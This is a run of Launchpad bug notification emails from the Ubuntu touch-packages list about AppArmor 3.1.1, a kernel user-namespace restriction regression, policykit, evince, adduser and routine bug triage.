LOGS This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on Launchpad at: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc - DEBDIFF The debdiff can be found in the PPA: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz - INSTALL / UPGRADE LOG - The apt upgrade log is attached. - + The apt upgrade log is attached in + https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt- + upgrade.log [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1 [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py ** Description changed: AppArmor 3.1.1 is the latest upstream version of the apparmor userspace tooling. This includes a large number of bug fixes since the 3.0.7 release which is currently in kinetic, as well as various cleanups and optimisations to the different tools to improve performance and maintainability. - The full ChangeLog can be seen at [1] + The full ChangeLog can be seen at [1]. Upstream does not provide a + ChangeLog file, however I have generated one based on the git commit + history of apparmor from the 3.0.7 tag to 3.1.1 as: + + $ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git- + log.log + + This can be seen in the attached file. + TESTING This has been extensively tested by the security team - this includes following the documented Ubuntu merges test plan[2] for AppArmor and the extensive QA Regression Tests[3] for AppArmor as well. This ensures that the various applications that make heavy use of AppArmor (LXD, docker, lxc, dbus, libvirt, snapd etc) have all been exercised and no
[Touch-packages] [Bug 1989309] Re: [FFe] apparmor 3.1.1 upstream release
** Attachment added: "apparmor-3.0.7-to-3.1.1-git-log.log" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git-log.log ** Description changed: AppArmor 3.1.1 is the latest upstream version of the apparmor userspace tooling. This includes a large number of bug fixes since the 3.0.7 release which is currently in kinetic, as well as various cleanups and optimisations to the different tools to improve performance and maintainability. The full ChangeLog can be seen at [1]. Upstream does not provide a ChangeLog file, however I have generated one based on the git commit history of apparmor from the 3.0.7 tag to 3.1.1 as: $ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git- log.log - This can be seen in the attached file. - + This can be seen in the attached file + https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git- + log.log TESTING This has been extensively tested by the security team - this includes following the documented Ubuntu merges test plan[2] for AppArmor and the extensive QA Regression Tests[3] for AppArmor as well. This ensures that the various applications that make heavy use of AppArmor (LXD, docker, lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions have been observed. All tests have passed and demonstrated both apparmor and the various applications that use it to be working as expected. BUILD LOGS This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on Launchpad at: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc DEBDIFF The debdiff can be found in the PPA: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz INSTALL / UPGRADE LOG The apt upgrade log is attached in https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt- upgrade.log [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1 [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1989309 Title: [FFe] apparmor 3.1.1 upstream release Status in apparmor package in Ubuntu: New Bug description: AppArmor 3.1.1 is the latest upstream version of the apparmor userspace tooling. This includes a large number of bug fixes since the 3.0.7 release which is currently in kinetic, as well as various cleanups and optimisations to the different tools to improve performance and maintainability. The full ChangeLog can be seen at [1]. Upstream does not provide a ChangeLog file, however I have generated one based on the git commit history of apparmor from the 3.0.7 tag to 3.1.1 as: $ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git-log.log This can be seen in the attached file https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git- log.log TESTING This has been extensively tested by the security team - this includes following the documented Ubuntu merges test plan[2] for AppArmor and the extensive QA Regression Tests[3] for AppArmor as well. This ensures that the various applications that make heavy use of AppArmor (LXD, docker, lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions have been observed. All tests have passed and demonstrated both apparmor and the various applications that use it to be working as expected. BUILD LOGS This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on Launchpad at: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc DEBDIFF The debdiff can be found in the PPA: https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz INSTALL / UPGRADE LOG The apt upgrade log is attached in https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt- upgrade.log [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1 [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages
[Touch-packages] [Bug 1990064] Re: unconfined profile denies userns_create for chromium based processes
This sounds like a kernel regression. The commit you link to is for SELinux, which is not enabled by default in Ubuntu, so I doubt it is that specifically - instead I suspect this is due to the following commit: https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/kinetic/commit/?h=master- next=30bce26855c9171f8dee74d93308fd506730c914 The logic here: int aa_profile_ns_perm(struct aa_profile *profile, struct common_audit_data *sa, u32 request) { ... if (profile_unconfined(profile)) { if (!unprivileged_userns_restricted || ns_capable_noaudit(current_user_ns(), CAP_SYS_ADMIN)) return 0; aad(sa)->info = "User namespace creation restricted"; /* fall through to below allows complain mode to override */ } else { struct aa_ruleset *rules = list_first_entry(>rules, typeof(*rules), list); aa_state_t state; state = RULE_MEDIATES(rules, aad(sa)->class); if (!state) /* TODO: add flag to complain about unmediated */ return 0; perms = *aa_lookup_perms(>policy, state); } aa_apply_modes_to_perms(profile, ); return aa_check_perms(profile, , request, sa, audit_ns_cb); } Seems to indicate that all unconfined processes that do not have CAP_SYS_ADMIN will be denied the ability to use user namespaces - this feels like a definite regression / policy change within the kernel itself. Should the kernel instead be built with CONFIG_SECURITY_APPARMOR_RESTRICT_USERNS=n ? Or is this code not doing what it was intended to do. ** Also affects: linux (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1990064 Title: unconfined profile denies userns_create for chromium based processes Status in apparmor package in Ubuntu: New Status in linux package in Ubuntu: New Bug description: For Ubuntu 22.10, since the last kernel update, i can´t launch any chromium based browser, due to apparmor denying userns_create dmesg shows: apparmor="DENIED" operation="userns_create" class="namespace" info="User namespace creation restricted" error=-13 profile="unconfined" pid=21323 comm="steamwebhelper" requested="userns_create" denied="userns_create" This happens for every process which uses a chromium engine, like google chrome itself or in this case steamwebhelper. Might be related to this change?: https://patchwork.kernel.org/project/netdevbpf/patch/20220801180146.1157914-5-f...@cloudflare.com/ not sure if it got merged in this form though.. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1990064/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1989309] [NEW] [FFe] apparmor 3.1.1 upstream release
Public bug reported: Placeholder for preparation of AppArmor 3.1.1 for kinetic. ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Summary changed: - [FFe] apparmor 3.1.0 upstream release + [FFe] apparmor 3.1.1 upstream release -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1989309 Title: [FFe] apparmor 3.1.1 upstream release Status in apparmor package in Ubuntu: New Bug description: Placeholder for preparation of AppArmor 3.1.1 for kinetic. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1972654] Re: [security review] Sync policykit-1 0.120-6 (main) from Debian experimental
> I do not intend to take further action to modify those packages. If it is a > blocker for Ubuntu > that they are fixed, then someone from Ubuntu will need to do that work. Given the relationship between the packages has now changed - ie. polkitd-pkla is not mutually exclusive from the javascript backend and then allows both legacy pkla policies as well as the "new" javascript policies to be handled - then this is not a blocker anymore from my point of view. I suspect Marc may also agree (especially given the relatively small number of packages in this category). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to policykit-1 in Ubuntu. https://bugs.launchpad.net/bugs/1972654 Title: [security review] Sync policykit-1 0.120-6 (main) from Debian experimental Status in policykit-1 package in Ubuntu: Confirmed Bug description: Please sync policykit-1 0.120-6 (main) from Debian experimental Changelog entries since current kinetic version 0.105-33: https://tracker.debian.org/media/packages/p/policykit-1/changelog-0.120-6 In particular, see the 0.120-4 changelog entry. I am filing a bug for Security Team review. Previously, Debian and Ubuntu developers agreed to keep using the last version of policykit before it switched to using JavaScript rules. But that was years ago. I believe Debian & Ubuntu are the only distros to have opted out of the new policykit. It is harder to maintain the old style rules when upstream rules use the new format. And it is a challenge to backport security and other bugfixes from the new series, without making mistakes or missing important details. There was a proposal to use duktape instead of mozjs for the JavaScript interpreter but I don't think that's been merged yet. It appears the Debian maintainer is considering switching Debian to the updated version in time for the next Debian Stable release (so uploading to unstable later this year). My requested deadline is August 25, Ubuntu 22.10 Feature Freeze. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1972654/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 283115] Re: Gimp: toolbox windows can't be minimized
** Changed in: gimp (Ubuntu) Status: Fix Released => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gtk+2.0 in Ubuntu. https://bugs.launchpad.net/bugs/283115 Title: Gimp: toolbox windows can't be minimized Status in The Gimp: Fix Released Status in GTK+: Unknown Status in gimp package in Ubuntu: Invalid Status in gtk+2.0 package in Ubuntu: New Bug description: gimp 2.6 in intrepid: it is impossible to minimize toolbar windows; they have only a x-Button to close ideally, these windows should be minimized automatically when the (last) Gimp image window is minimized Update While waiting, I designed some sort of workaround : Gnome>System>Preferences>Windows>Double-click titlebar>Roll up To manage notifications about this bug go to: https://bugs.launchpad.net/gimp/+bug/283115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969896] Re: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched
** Also affects: evince (Ubuntu Jammy) Importance: Undecided Status: New ** Also affects: apparmor (Ubuntu Jammy) Importance: Undecided Status: New ** Also affects: evince (Ubuntu Kinetic) Importance: High Status: In Progress ** Also affects: apparmor (Ubuntu Kinetic) Importance: High Status: Confirmed ** Changed in: apparmor (Ubuntu Kinetic) Status: Confirmed => In Progress ** Changed in: apparmor (Ubuntu Jammy) Status: New => In Progress ** Changed in: apparmor (Ubuntu Kinetic) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu Jammy) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu Jammy) Importance: Undecided => High -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1969896 Title: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched Status in apparmor package in Ubuntu: In Progress Status in evince package in Ubuntu: In Progress Status in apparmor source package in Jammy: In Progress Status in evince source package in Jammy: New Status in apparmor source package in Kinetic: In Progress Status in evince source package in Kinetic: In Progress Bug description: Just switched from Ubuntu 20.04 to 22.04 and realized that Document Viewer no longer open on the last viewed page and doesn't remember the side pane preference even after using the "Save Current Settings as Default" option. Kindly advise ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: evince 42.1-3 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Fri Apr 22 15:58:50 2022 InstallationDate: Installed on 2022-03-19 (34 days ago) InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223) ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to jammy on 2022-04-21 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1969896/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969896] Re: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched
FYI I have sent a MR to the upstream AppArmor project to remove this dbus deny rule from the exo-open abstraction: https://gitlab.com/apparmor/apparmor/-/merge_requests/884 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1969896 Title: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched Status in apparmor package in Ubuntu: New Status in evince package in Ubuntu: In Progress Bug description: Just switched from Ubuntu 20.04 to 22.04 and realized that Document Viewer no longer open on the last viewed page and doesn't remember the side pane preference even after using the "Save Current Settings as Default" option. Kindly advise ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: evince 42.1-3 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Fri Apr 22 15:58:50 2022 InstallationDate: Installed on 2022-03-19 (34 days ago) InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223) ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to jammy on 2022-04-21 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1969896/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978042] Re: adduser doesn't support extrausers for group management
This looks like a duplicate of LP: #1959375 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1978042 Title: adduser doesn't support extrausers for group management Status in adduser package in Ubuntu: Fix Released Status in shadow package in Ubuntu: Fix Released Status in adduser source package in Focal: New Status in shadow source package in Focal: New Status in adduser source package in Impish: Fix Released Status in shadow source package in Impish: Fix Released Status in adduser source package in Jammy: Fix Released Status in shadow source package in Jammy: Fix Released Status in adduser source package in Kinetic: Fix Released Status in shadow source package in Kinetic: Fix Released Bug description: [Impact] When using adduser --extrausers on Ubuntu Core the command attempts to use the /etc/group file instead of /var/lib/extrausers/group. e.g. the following commands will fail: $ adduser --extrausers user group $ adduser --extrausers --ingroup group user [Test Plan] 1. Install libnss-extrausers 2. Add a new group: $ sudo adduser --extrausers --group test-group 3. Create a new user with this group: $ adduser --extrausers --ingroup test-group test-user1 4. Create a new user and add them to this group: $ adduser --extrausers test-user2 $ adduser --extrausers test-user2 test-group Expected result: Two new users (test-user1 and test-user2) are successfully added to the system and are entered in /var/lib/extrausers/{passwd,shadow}. A new group (test-group) is successfully added to /var/lib/extrausers/group and contains the new users. [Where problems could occur] Existing users of adduser and gpasswd that don't use --extrausers are unlikely to hit any issues, as their codepath is unchanged. Existing users that use --extrausers will have a behavior change, but the existing behavior was to fail so this is unlikely to introduce any new issues. There is the risk of introducing new bugs by this change, but it has used since impish without any issues being detected. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1978042/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1977710] Re: /etc/adduser.conf.dpkg-save created by postinst since 3.121ubuntu1
>From what I can see of this postinst this looks to be a bug from adduser in debian itself - and would appear to come from https://salsa.debian.org/debian/adduser/-/blob/master/debian/postinst#L33 - ie. if the default value is unchanged then an /etc/adduser.conf.dpkg- save is always generated when the value of DIR_MODE is appended to /etc/adduser.conf. Can you confirm if this also occurs when debootstrapping a system from debian? ** Changed in: adduser (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1977710 Title: /etc/adduser.conf.dpkg-save created by postinst since 3.121ubuntu1 Status in adduser package in Ubuntu: Incomplete Bug description: Since version 3.121ubuntu1 adduser's postinst script creates /etc/adduser.conf.dpkg-save file on debootstrap's root filesystem, that is, even when /etc/adduser.conf doesn't exist prior to package installation. Because of the change below the postinst script changes packaged /etc/adduser.conf and creates /etc/adduser.conf.dpkg-save as a backup: - Enable private home directories by default (LP: #48734) + Set DIR_MODE=0750 in the default adduser.conf + Change the description and default value to select private home directories by default in debconf template + Change the DIR_MODE when private home directories is configured via debconf from 0751 to 0750 to ensure files are truly private The .dpkg-save file shouldn't be present on debootstrapped system. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1977710/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
@mardy I thought we had snapd.apparmor specifically to avoid this scenario but I can't see that service mentioned at all in systemd- analyze plot... -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in snapd source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1975407] Re: pulseaudio is getting crashed
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1975407 Title: pulseaudio is getting crashed Status in pulseaudio package in Ubuntu: New Bug description: Operating System: Ubuntu 22.04 Life cycle: LTS Architecture: AMD64 Kernel version (uname -a): 5.15.0-30-generic ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: pulseaudio 1:15.99.1+dfsg1-1ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30 Uname: Linux 5.15.0-30-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: johnm 3822 F pulseaudio CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Sun May 22 12:08:58 2022 PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: XDG_RUNTIME_DIR (/run/user/1000) is not owned by us (uid 0), but by uid 1000! (This could e.g. happen if you try to connect to a non-root PulseAudio as a root user, over the native protocol. Don't do that.) No PulseAudio daemon running, or not running as session daemon. SourcePackage: pulseaudio Symptom: audio UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 04/11/2019 dmi.bios.release: 15.104 dmi.bios.vendor: Hewlett-Packard dmi.bios.version: 68IRR Ver. F.68 dmi.board.name: 17F6 dmi.board.vendor: Hewlett-Packard dmi.board.version: KBC Version 58.21 dmi.chassis.type: 10 dmi.chassis.vendor: Hewlett-Packard dmi.ec.firmware.release: 88.33 dmi.modalias: dmi:bvnHewlett-Packard:bvr68IRRVer.F.68:bd04/11/2019:br15.104:efr88.33:svnHewlett-Packard:pnHPProBook4540s:pvrA1008C11:rvnHewlett-Packard:rn17F6:rvrKBCVersion58.21:cvnHewlett-Packard:ct10:cvr:skuB7A48EA#ABV: dmi.product.family: 103C_5336AN G=N L=BUS B=HP S=PRO dmi.product.name: HP ProBook 4540s dmi.product.sku: B7A48EA#ABV dmi.product.version: A1008C11 dmi.sys.vendor: Hewlett-Packard modified.conffile..etc.xdg.autostart.pulseaudio.desktop: [modified] mtime.conffile..etc.xdg.autostart.pulseaudio.desktop: 2022-01-28T22:42:20.933634 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1975407/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1975408] Re: Performance is much worse than expected (Normal friendly behaviors)
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1975408 Title: Performance is much worse than expected (Normal friendly behaviors) Status in xorg package in Ubuntu: New Bug description: Operating System: Ubuntu 22.04 Life cycle: LTS Architecture: AMD64 Kernel version (uname -a): 5.15.0-30-generic ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30 Uname: Linux 5.15.0-30-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sun May 22 12:10:30 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu DkmsStatus: sysdig/0.27.1, 5.15.0-30-generic, x86_64: installed ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company 3rd Gen Core processor Graphics Controller [103c:17f4] MachineType: Hewlett-Packard HP ProBook 4540s ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-30-generic root=UUID=cf164159-2e29-4cee-aef2-f8d16c319f1a ro snapd_recovery_mode snap_core quiet splash crashkernel=512M-:192M vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 04/11/2019 dmi.bios.release: 15.104 dmi.bios.vendor: Hewlett-Packard dmi.bios.version: 68IRR Ver. F.68 dmi.board.name: 17F6 dmi.board.vendor: Hewlett-Packard dmi.board.version: KBC Version 58.21 dmi.chassis.type: 10 dmi.chassis.vendor: Hewlett-Packard dmi.ec.firmware.release: 88.33 dmi.modalias: dmi:bvnHewlett-Packard:bvr68IRRVer.F.68:bd04/11/2019:br15.104:efr88.33:svnHewlett-Packard:pnHPProBook4540s:pvrA1008C11:rvnHewlett-Packard:rn17F6:rvrKBCVersion58.21:cvnHewlett-Packard:ct10:cvr:skuB7A48EA#ABV: dmi.product.family: 103C_5336AN G=N L=BUS B=HP S=PRO dmi.product.name: HP ProBook 4540s dmi.product.sku: B7A48EA#ABV dmi.product.version: A1008C11 dmi.sys.vendor: Hewlett-Packard version.compiz: compiz 1:0.9.14.1+22.04.20211217-0ubuntu2 version.libdrm2: libdrm2 2.4.110+git2205140500.3f266e~oibaf~j version.libgl1-mesa-dri: libgl1-mesa-dri 22.2~git2205160600.3c0f34~oibaf~j version.libgl1-mesa-glx: libgl1-mesa-glx 22.2~git2205170600.fffafa~oibaf~j version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1975408/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1975381] Re: firewall gets disabled
Thank you for taking the time to report this bug and helping to make Ubuntu better. Unfortunately we can't fix it, because your description didn't include enough information. You may find it helpful to read 'How to report bugs effectively' http://www.chiark.greenend.org.uk/~sgtatham/bugs.html. We'd be grateful if you would then provide a more complete description of the problem. We have instructions on debugging some types of problems at http://wiki.ubuntu.com/DebuggingProcedures. At a minimum, we need: 1. the specific steps or actions you took that caused you to encounter the problem, 2. the behavior you expected, and 3. the behavior you actually encountered (in as much detail as possible). Thanks! ** Changed in: iptables (Ubuntu) Status: New => Incomplete ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to iptables in Ubuntu. https://bugs.launchpad.net/bugs/1975381 Title: firewall gets disabled Status in iptables package in Ubuntu: Incomplete Bug description: Operating System: Ubuntu 22.04 Life cycle: LTS Architecture: AMD64 Kernel version (uname -a): 5.15.0-30-generic ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: iptables 1.8.7-1ubuntu5 ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30 Uname: Linux 5.15.0-30-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Mon May 16 23:44:26 2022 SourcePackage: iptables UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/iptables/+bug/1975381/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1973654] Re: Using debian-installer on a server with a Let's Encrypt cert dies
